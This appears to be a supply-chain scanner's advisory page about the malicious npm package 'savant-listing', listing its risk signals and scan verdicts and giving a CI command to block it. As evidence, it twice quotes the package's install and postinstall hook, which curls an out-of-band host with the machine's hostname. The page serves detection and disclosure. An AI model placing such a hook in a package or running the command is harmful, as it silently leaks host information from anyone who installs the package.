npm · registry.npmjs.org

savant-listing

Install Lifecycle Repeated Payload: install,postinstall="curl https://d8g1g8c86mdq190585kgfijgspz7hwfwc.oast.site/info/?hostname=$(hostname)"

Early detection

PkgRadar flagged this 6.1 days before public disclosure

Detected 2026-06-03 · disclosed as MAL-2026-5401 on 2026-06-09

Why PkgRadar flagged 999.9.10

Severity	Signal	Evidence
high	Install Lifecycle Repeated Payload	install,postinstall="curl https://d8g1g8c86mdq190585kgfijgspz7hwfwc.oast.site/info/?hostname=$(hostname)" · package.json
high	New Account With Lifecycle Hook	package first published 7 day(s) ago, 2 total version(s), has lifecycle hook · package.json

Scanned versions

Version	Verdict	Score	Scanned (UTC)
`999.9.10`	High risk	35	2026-06-10
`999.9.9`	High risk	35	2026-06-10

Block this in CI

PkgRadar gates savant-listing (and every other dependency) before it merges. One line in your pipeline:

pkgradar gate --ecosystem npm [email protected]